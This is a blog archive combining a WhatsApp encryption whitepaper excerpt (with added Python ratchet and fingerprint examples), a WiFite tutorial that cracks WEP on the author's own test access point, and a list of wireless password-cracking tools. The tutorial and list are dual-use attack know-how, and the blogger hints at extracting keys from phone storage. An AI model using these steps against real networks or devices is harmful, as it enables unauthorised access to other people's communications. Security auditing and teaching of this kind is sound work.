Once a response is received,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">a new <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">are calculated as:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . <span style="color: #59595c; font-style: normal; font-variant: normal;">ephemeral_secret =<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ECDH(Ephemeral<span style="color: #939597; font-style: normal; font-variant: normal;">sender<span style="color: #59595c; font-style: normal; font-variant: normal;">, Ephemeral<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="color: #59595c; font-style: normal; font-variant: normal;">2. Chain Key, Root Key = HKDF(Root Key, ephemeral_secret).<br />
A chain is only ever used to send messages from one user, so message keys are not reused. Because of the way Message Keys and Chain Keys are calculated, messages can arrive delayed, out of order, or be lost entirely without any problems.<br />
<span style="color: #39bca8; font-style: normal; font-variant: normal;">Transmitting Media and Other Attachments</span><br />
Large attachments of any type (video, audio, images, or files) are also end-to-end encrypted:<br />
1. The WhatsApp user sending a message (“sender”) generates an ephemeral 32-byte AES256 key and an ephemeral 32-byte HMAC-SHA256 key.<br />
2. The sender encrypts the attachment with the AES256 key in CBC mode with a random IV, then appends a MAC of the ciphertext using HMAC-SHA256.<br />
3. The sender uploads the encrypted attachment to a blob store.<br />
4. The sender transmits a normal encrypted message to the recipient that contains the encryption key, the HMAC key, a SHA256 hash of the encrypted blob, and a pointer to the blob in the blob store.<br />
5. The recipient decrypts the message, retrieves the encrypted blob from the blob store, verifies the SHA256 hash of it, verifies the MAC, and decrypts the plaintext.<br />
<span style="color: #39bca8; font-style: normal; font-variant: normal;">Group Messages</span><br />
Traditional unencrypted messenger apps typically employ “server-side fan-out” for group messages. A client wishing to send a message to a group of users transmits a single message, which is then distributed N times to the N different group members by the server. This is in contrast to “client-side fan-out,” where a client would transmit a single message N times to the N different group members itself.<br />
Messages to WhatsApp groups build on the pairwise encrypted sessions outlined above to achieve efficient server-side fan-out for most messages sent to groups. This is accomplished using the “Sender Keys” component of the Signal Messaging protocol.</span></span></span><br />
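The hash ratchet and DH ratchet from the Exchanging Messages sections above, as an added Python example: this is not WhatsApp's or libsignal's code and is not part of the original post. It uses only the standard library, so the AES256-CBC encryption of the message body is left out; what it shows is the key schedule (Message Key = HMAC-SHA256(Chain Key, 0x01), Chain Key = HMAC-SHA256(Chain Key, 0x02)), an RFC 5869 HKDF for the Root Key and Chain Key step, and what a receiver has to do for the delayed and out-of-order delivery the text promises: ratchet ahead, cache the Message Keys it skipped, and never commit new state before the MAC has been checked. The HKDF salt and info label, the MAX_SKIP bound, the 4-byte counter in the MAC input and the ECDH output passed in as a plain 32-byte value are assumptions of this example; the page does not specify them.

```python
import hashlib
import hmac

# Added example: stdlib-only model of the symmetric ratchet described on this
# page. Not WhatsApp's or libsignal's code. AES-CBC is not reproduced; the
# message body here is authenticated with HMAC-SHA256 only.


def hmac_sha256(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def hkdf_sha256(ikm: bytes, salt: bytes, info: bytes, length: int) -> bytes:
    """RFC 5869 HKDF (extract, then expand) with SHA-256."""
    prk = hmac_sha256(salt, ikm)
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac_sha256(prk, block + info + bytes([counter]))
        okm += block
        counter += 1
    return okm[:length]


def next_message_key(chain_key: bytes) -> tuple:
    """One hash-ratchet step: returns (Message Key, advanced Chain Key).

    Message Key = HMAC-SHA256(Chain Key, 0x01); Chain Key = HMAC-SHA256(Chain Key, 0x02).
    HMAC is one-way, so a stored Message Key yields neither the current nor a past Chain Key.
    """
    return hmac_sha256(chain_key, b"\x01"), hmac_sha256(chain_key, b"\x02")


def dh_ratchet(root_key: bytes, ephemeral_secret: bytes) -> tuple:
    """Chain Key, Root Key = HKDF(Root Key, ephemeral_secret).

    ephemeral_secret is the ECDH(Ephemeral_sender, Ephemeral_recipient) output; X25519 is
    not in the standard library, so the caller supplies those 32 bytes. Using the old
    Root Key as HKDF salt and the label below as info is an assumption of this example.
    """
    okm = hkdf_sha256(ephemeral_secret, salt=root_key, info=b"example ratchet step", length=64)
    return okm[:32], okm[32:]  # (new Chain Key, new Root Key)


class SendingChain:
    """Sender side of one chain: a fresh Message Key for every message."""

    def __init__(self, chain_key: bytes):
        self.chain_key = chain_key
        self.counter = 0

    def send(self, body: bytes) -> tuple:
        message_key, self.chain_key = next_message_key(self.chain_key)
        counter = self.counter
        self.counter += 1
        tag = hmac_sha256(message_key, counter.to_bytes(4, "big") + body)
        return counter, body, tag


class ReceivingChain:
    """Receiver side: tolerates delayed, out-of-order and lost messages by
    ratcheting ahead and caching the Message Keys it skipped over."""

    MAX_SKIP = 1000  # assumed bound: a bogus counter must not exhaust memory

    def __init__(self, chain_key: bytes):
        self.chain_key = chain_key
        self.counter = 0
        self.skipped = {}  # counter -> Message Key not yet used

    def receive(self, counter: int, body: bytes, tag: bytes) -> bytes:
        # Work on copies; commit to self only after the MAC verifies, so a forged
        # counter or tag cannot push the chain forward or drop cached keys.
        chain_key, next_counter, newly_skipped = self.chain_key, self.counter, {}
        if counter in self.skipped:
            message_key = self.skipped[counter]
        else:
            if counter < self.counter:
                raise ValueError("counter already consumed (replay)")
            if counter - self.counter > self.MAX_SKIP:
                raise ValueError("too many skipped messages")
            while next_counter < counter:  # keep keys of messages not seen yet
                skipped_key, chain_key = next_message_key(chain_key)
                newly_skipped[next_counter] = skipped_key
                next_counter += 1
            message_key, chain_key = next_message_key(chain_key)
            next_counter += 1
        expected = hmac_sha256(message_key, counter.to_bytes(4, "big") + body)
        if not hmac.compare_digest(tag, expected):
            raise ValueError("bad MAC; receiver state left untouched")
        self.skipped.pop(counter, None)
        self.skipped.update(newly_skipped)
        self.chain_key, self.counter = chain_key, next_counter
        return body


if __name__ == "__main__":
    shared = bytes(range(32))  # constructed Chain Key both sides hold
    alice, bob = SendingChain(shared), ReceivingChain(shared)
    msgs = [alice.send(b"first"), alice.send(b"second"), alice.send(b"third")]
    print(bob.receive(*msgs[2]))  # arrives first; keys for 0 and 1 are cached
    print(bob.receive(*msgs[0]))
```

The point a practitioner should take from the receiver: the ratchet is what makes out-of-order delivery harmless, but only if the receiver derives into temporaries and commits after authentication, otherwise one unauthenticated packet with a large counter burns through the chain.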
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">The first time a WhatsApp group member sends a message to a group:<br />
1. The sender generates a random 32-byte Chain Key.<br />
2. The sender generates a random Curve25519 Signature Key key pair.<br />
3. The sender combines the 32-byte Chain Key and the public key from the Signature Key into a Sender Key message.<br />
4. The sender individually encrypts the Sender Key to each member of the group, using the pairwise messaging protocol explained previously.<br />
For all subsequent messages to the group:<br />
1. The sender derives a Message Key from the Chain Key, and updates the Chain Key.<br />
2. The sender encrypts the message using AES256 in CBC mode.<br />
3. The sender signs the ciphertext using the Signature Key.<br />
4. The sender transmits the single ciphertext message to the server, which does server-side fan-out to all group participants.<br />
The “hash ratchet” of the message sender’s Chain Key provides forward secrecy. Whenever a group member leaves, all group participants clear their Sender Key and start over.<br />
<span style="color: #39bca8; font-style: normal; font-variant: normal;">Call Setup</span><br />
WhatsApp calls are also end-to-end encrypted. When a WhatsApp user initiates a call:<br />
1. The initiator builds an encrypted session with the recipient (as outlined in Section <i>Initiating Session Setup</i>), if one does not already exist.<br />
2. The initiator generates a random 32-byte SRTP master secret.<br />
3. The initiator transmits an encrypted message to the recipient that signals an incoming call, and contains the SRTP master secret.<br />
4. If the responder answers the call, an SRTP encrypted call ensues.<br />
<span style="color: #39bca8; font-style: normal; font-variant: normal;">Verifying Keys</span><br />
WhatsApp users additionally have the option to verify the keys of the other users with whom they are communicating so that they are able to confirm that an unauthorized third party (or WhatsApp) has not initiated a man-in-the-middle attack. This can be done by scanning a QR code, or by comparing a 60-digit number.</span></span></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">The QR code contains:<br />
1. A version.<br />
2. The user identifier for both parties.<br />
3. The full 32-byte public Identity Key for both parties.<br />
When either user scans the other’s QR code, the keys are compared to ensure that what is in the QR code matches the Identity Key as retrieved from the server.<br />
The 60-digit number is computed by concatenating the two 30-digit numeric fingerprints for each user’s Identity Key. To calculate a 30-digit numeric fingerprint:<br />
1. Iteratively SHA-512 hash the public Identity Key and user identifier 5200 times.<br />
2. Take the first 30 bytes of the final hash output.<br />
3. Split the 30-byte result into six 5-byte chunks.<br />
4. Convert each 5-byte chunk into 5 digits by interpreting each 5-byte chunk as a big-endian unsigned integer and reducing it modulo 100000.<br />
5. Concatenate the six groups of five digits into thirty digits.<br />
<span style="color: #39bca8; font-style: normal; font-variant: normal;">Transport Security</span><br />
All communication between WhatsApp clients and WhatsApp servers is layered within a separate encrypted channel. On Windows Phone, iPhone, and Android, those end-to-end encryption capable clients use Noise Pipes with Curve25519, AES-GCM, and SHA256 from the Noise Protocol Framework for long running interactive connections.<br />
This provides clients with a few nice properties:<br />
1. Extremely fast lightweight connection setup and resume.<br />
2. Encrypts metadata to hide it from unauthorized network observers. No information about the connecting user’s identity is revealed.<br />
3. No client authentication secrets are stored on the server. Clients authenticate themselves using a Curve25519 key pair, so the server only stores a client’s public authentication key. If the server’s user database is ever compromised, no private authentication credentials will be revealed.</span></span></span><br />
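The 30-digit numeric fingerprint and the 60-digit comparison number from the Verifying Keys section above, as an added Python example: not WhatsApp's or libsignal's code, and not part of the original post. The page lists the steps but not the exact byte layout fed to SHA-512, so the framing used here (start from Identity Key plus identifier, then re-hash the running digest together with the Identity Key on each of the 5200 iterations) and the sorted ordering of the two 30-digit halves are assumptions; the digits produced will therefore not match what the app displays, only the structure and the chunk-to-digits rule will. The identity keys and identifiers are constructed for the example.

```python
import hashlib
import hmac

# Added example, not libsignal's or WhatsApp's code. Constants come from the
# page; the input framing inside numeric_fingerprint is an assumption.
ITERATIONS = 5200
FINGERPRINT_BYTES = 30
CHUNK = 5  # six 5-byte chunks -> six 5-digit groups


def chunk_to_digits(chunk: bytes) -> str:
    """Step 4: big-endian unsigned integer of one 5-byte chunk, mod 100000, zero-padded."""
    if len(chunk) != CHUNK:
        raise ValueError("chunk must be exactly 5 bytes")
    return "%05d" % (int.from_bytes(chunk, "big") % 100000)


def numeric_fingerprint(identity_key: bytes, identifier: bytes, iterations: int = ITERATIONS) -> str:
    """Steps 1-5 from the page for one party's Identity Key and user identifier.

    Assumed framing: digest_0 = key || identifier, digest_i = SHA-512(digest_{i-1} || key),
    so the key is bound into every round and not only the first one.
    """
    if len(identity_key) != 32:
        raise ValueError("Identity Key must be the 32-byte Curve25519 public key")
    digest = identity_key + identifier
    for _ in range(iterations):
        digest = hashlib.sha512(digest + identity_key).digest()
    head = digest[:FINGERPRINT_BYTES]
    return "".join(chunk_to_digits(head[i:i + CHUNK]) for i in range(0, FINGERPRINT_BYTES, CHUNK))


def safety_number(local_key: bytes, local_id: bytes, remote_key: bytes, remote_id: bytes) -> str:
    """The 60-digit number: both 30-digit fingerprints concatenated.

    Sorting the halves (an assumption; the page does not state the order) makes both
    phones display the same 60 digits whichever side computes it.
    """
    halves = sorted([numeric_fingerprint(local_key, local_id),
                     numeric_fingerprint(remote_key, remote_id)])
    return halves[0] + halves[1]


def qr_matches_server(qr_identity_key: bytes, server_identity_key: bytes) -> bool:
    """QR check from the page: the scanned Identity Key must equal the one the
    client fetched from the server for that contact. Constant-time compare."""
    return hmac.compare_digest(qr_identity_key, server_identity_key)


if __name__ == "__main__":
    alice_key, bob_key = bytes(range(32)), bytes(range(32, 64))  # constructed keys
    print(safety_number(alice_key, b"+15550000001", bob_key, b"+15550000002"))
```

Because the fingerprint is derived from the Identity Key, a server (or anyone between the two clients) that substituted its own key would change the digits; the comparison only protects the user who actually compares them out of band.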
<br />
<span style="color: #39bca8; font-family: Roboto-Light; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Conclusion<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Messages between WhatsApp users are protected with an end-to-end encryption protocol so that third parties and WhatsApp cannot read them and so that the messages can only be decrypted by the recipient. All types of WhatsApp messages (including chats, group chats, images, videos, voice messages and files) and WhatsApp calls are protected by end-to-end encryption. WhatsApp servers do not have access to the private keys of WhatsApp users, and WhatsApp users have the option to verify keys in order to ensure the integrity of their communication.<br />
The Signal protocol library used by WhatsApp is Open Source, available here: https://github.com/whispersystems/libsignal-protocol-java/</span></span></span></span><br />
<br />
<br />
<span style="color: #39bca8; font-family: Roboto-Light; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">So what we can take from this: WhatsApp keeps a separate session with each contact, and the keys of that session ratchet forward with every message, but all of the private keys and session state live only on the device, never on the server. Cloning the phone's MAC address and IMEI does not copy that key material; getting at the device's storage, where the keys and the message database sit, does, and that is the treasure box. Wait for my next post :p</span></span></span></span><!--EndFragm--></div>
Wireless Hacking using WiFite part-1 (published 2016-01-23)<div dir="ltr" style="text-align: left;" trbidi="on">
In this article series, we will look at a tool named Wifite, suitable for
automated auditing of wireless networks. Most of you who have
experience in wireless pentesting would use tools like airmon-ng,
aireplay-ng, airodump-ng and aircrack-ng to crack wireless networks. This
involves a sequence of steps, like capturing a specific number of
IVs in the case of WEP or capturing the WPA handshake in the case of WPA, and
then using aircrack-ng to crack the password required for
authentication to the network. Wifite aims to ease this process by wrapping
all these tools, which makes it very easy to crack Wi-Fi networks.<br />
Here is a list of features of Wifite as per its official <a href="https://code.google.com/p/wifite/"><span style="color: blue;">homepage</span></a>.<br />
<ul>
<li>sorts targets by signal strength (in dB); cracks closest access points first</li>
<li>automatically de-authenticates clients of hidden networks to reveal SSIDs</li>
<li>numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)</li>
<li>customizable settings (timeouts, packets/sec, etc)</li>
<li>“anonymous” feature; changes MAC to a random address before attacking, then changes back when attacks are complete</li>
<li>all captured WPA handshakes are backed up to wifite.py’s current directory</li>
<li>smart WPA de-authentication; cycles between all clients and broadcast deauths</li>
<li>stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit</li>
<li>displays session summary at exit; shows any cracked keys</li>
<li>all passwords saved to cracked.txt</li>
<li>built-in updater: ./wifite.py -upgrade</li>
</ul>
Before we start using Wifite, make sure you have a wireless
card that supports packet injection. If you don’t have one, I would
suggest that you buy <a href="http://www.amazon.com/Alfa-AWUS036H-802-11b-Wireless-network/dp/B002WCEWU8"><span style="color: blue;">this</span></a> card.<br />
Note that there is a bug in Wifite that may or may not be present in
your particular version of Wifite. The bug prevents aireplay-ng
from functioning properly and displays an error like <em>aireplay-ng exited unexpectedly</em>.
In order to fix this, you will have to make slight modifications to the
code of wifite. You can install gedit (apt-get install gedit), which is a
text editor, and then edit the wifite python script (found in
/usr/bin/wifite) using the steps mentioned <a href="https://code.google.com/p/wifite/issues/detail?id=127"><span style="color: blue;">here</span></a>. To open wifite, use the command <em>gedit /usr/bin/wifite</em>. This will open up the source code of wifite. Then replace every occurrence of <em>cmd = ['aireplay-ng',</em> with <em>cmd = ['aireplay-ng','--ignore-negative-one',</em><br />
Wifite can be found under <em>Applications -> Kali Linux -> Wireless Attacks -> 802.11 Wireless Tools</em>.
Also, note that if you are running wifite in a different VM than Kali
Linux, then you have to make sure that tools like airmon-ng,
aireplay-ng, airodump-ng, aircrack-ng are already installed on that
system. This is because Wifite is nothing but a wrapper over all these
tools. Before we even start using Wifite, it is better to update to the
latest version.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt1.png" /><br />
In my case, I already have the latest version. In this tutorial, we
will be targeting a simple Wifi network with WEP encryption. Just using
the command <em>wifite -h</em> will give you a list of all the commands.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt2.png" /><br />
A very tempting option would be <em>-all</em>, which tries to attack
every network that it finds. We will try it in later articles in this
series. However, first let's take a look at all the targets that we have.
To do that, use the command <em>wifite -showb</em><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt3.png" /><br />
Once this is done, we can see that wifite has put our network
interface card into monitor mode (using airmon-ng) and started to look
for clients. After a few more seconds, it will start displaying the list
of access points.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt4.png" /><br />
Note that as it is mentioned in its feature list (automatically
de-authenticates clients of hidden networks to reveal SSIDs), this list
will also include hidden access points. Hence, wifite can also be used
to find hidden access points. In this case we will attack an access
point with the BSSID 00:26:75:02:EF:65 that I have set up for testing
purposes. The access point has a simple WEP password <em>1234567890</em>.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt5.png" /><br />
To start attacking an access point, just press <em>Ctrl+C</em>.
Wifite will now ask you to choose a target number from the list. The
target number for my test network is 1, so let me enter that. Note that
if you press <em>Ctrl+C</em> again, it will quit Wifite.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt6.png" /><br />
You can now see that Wifite will start attempting to crack the WEP
access point using the different known techniques for cracking WEP
encryption. After some unsuccessful tries, it finally begins attacking
the access point with the various WEP cracking techniques.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt7.png" /><br />
Once enough IVs have been captured, it will automatically start cracking the password.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt8.png" /><br />
As we can see, Wifite has successfully figured out the WEP key for
the access point. Wifite is an extremely useful tool for cracking
wireless networks. As I mentioned previously, you need to have all the
tools like airmon-ng, aireplay-ng, airodump-ng, aircrack-ng already
installed on your system. To further prove the point, let’s dive into
the source code of Wifite.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt9.png" /><br />
As we can see, the python code has mentions of calling aireplay-ng. Hence, it is recommended to run Wifite inside Kali Linux.<br />
<br />
In the next article, we will look at some advanced usage options of Wifite.</div>
20 Popular Wireless Hacking Tools (2016), posted 2016-01-23<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Last year, I wrote an article covering popular wireless hacking tools used to crack or recover the passwords of wireless networks. We added 13 tools in that article which were popular and work great. Now I am updating that post to add a few more to that list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I will not explain wireless security and WPA/WEP here. You can read the <span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">existing article on wireless hacking tools</span> to learn about them. In this post, I am updating the existing list to add a few more powerful tools. I am adding seven new tools to the existing list to give you a single list of the most used wireless cracking tools.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA3yaKsaG7pXTm1pqZgkrfe0yYOI10iGGbXqELv0O-9htg-654eosui_GKHVNeQgwVrWVHCxXl6bI0UuR2nkZeZ2z4M8rzdJDDDMGPrFOZhoRhCONWFEmOjZBepTMLo1Ba0GPoMHfyhyphenhyphenXW/s1600/Wireshark_icon.svg_-1024x0-c-default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA3yaKsaG7pXTm1pqZgkrfe0yYOI10iGGbXqELv0O-9htg-654eosui_GKHVNeQgwVrWVHCxXl6bI0UuR2nkZeZ2z4M8rzdJDDDMGPrFOZhoRhCONWFEmOjZBepTMLo1Ba0GPoMHfyhyphenhyphenXW/s320/Wireshark_icon.svg_-1024x0-c-default.png" width="320" /></a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<br /></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
1. Aircrack</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Aircrack is the most popular and widely-known wireless password cracking tool. It is used around the globe as an 802.11 WEP and WPA-PSK key cracking tool. It first captures packets of the network and then tries to recover the password of the network by analyzing those packets. It also implements the standard FMS attack with some optimizations to recover or crack the password of the network. These optimizations include the KoreK attacks and the PTW attack, which make the attack much faster than other WEP password cracking tools. This tool is powerful and used most widely across the world. This is the reason I am adding it at the top of the list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It offers a console interface. If you find this tool hard to use, you can try the available online tutorials. The company behind this tool also offers online tutorials to let you learn by yourself.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download: <a href="http://www.aircrack-ng.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.aircrack-ng.org/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
2. AirSnort</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
AirSnort is another popular wireless LAN password cracking tool. It can crack WEP keys of Wi-Fi 802.11b networks. This tool basically operates by passively monitoring transmissions and then computing the encryption key when enough packets have been gathered. This tool is freely available for the Linux and Windows platforms. It is also simple to use. The tool has not been updated for around three years, but it seems that the company behind this tool is now interested in further development. This tool is also directly involved in WEP cracking and hence used widely.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download AirSnort:<a href="http://sourceforge.net/projects/airsnort/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> http://sourceforge.net/projects/airsnort/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
3. Kismet</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Kismet is another Wi-Fi 802.11 a/b/g/n layer 2 wireless network sniffer and intrusion detection system. This tool is basically used in Wi-Fi troubleshooting. It works fine with any Wi-Fi card supporting rfmon mode. It is available for the Windows, Linux, OS X and BSD platforms. This tool passively collects packets to identify standard networks and also detects hidden networks. Built on a client-server modular architecture, this tool can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. It is an open source tool and supports the recent, faster wireless standards.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Kismet: <a href="http://www.kismetwireless.net/download.shtml" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.kismetwireless.net/download.shtml</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
4. Cain &amp; Abel</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Cain &amp; Abel is another popular tool used for cracking wireless network passwords. This tool was developed to intercept network traffic and then use brute forcing to discover passwords. This is why this tool helps a lot in finding the password of a wireless network by analyzing the routing protocols. This tool can also be used to crack other kinds of passwords. It is one of the most popular password cracking tools.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This tool is not just for WEP cracking; various other features are also there. It is basically used for Windows password cracking. This is the reason this tool is so popular among users.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Cain &amp; Abel: <a href="http://www.oxid.it/cain.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.oxid.it/cain.html</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
5. Wireshark</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Wireshark is a very popular tool in networking. It is a network protocol analyzer which lets you check different things in your office or home network. You can capture packets live and analyze them to find various things related to the network by checking the data at the micro-level. This tool is available for Windows, Linux, OS X, Solaris, FreeBSD and other platforms.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you are thinking of trying this tool, I recommend that you first read about networking and protocols. Wireshark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try it only if you are sure about your protocol knowledge.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Wireshark is one of the most popular tools in networking, and this is why it is included in a high position in this list.</div>
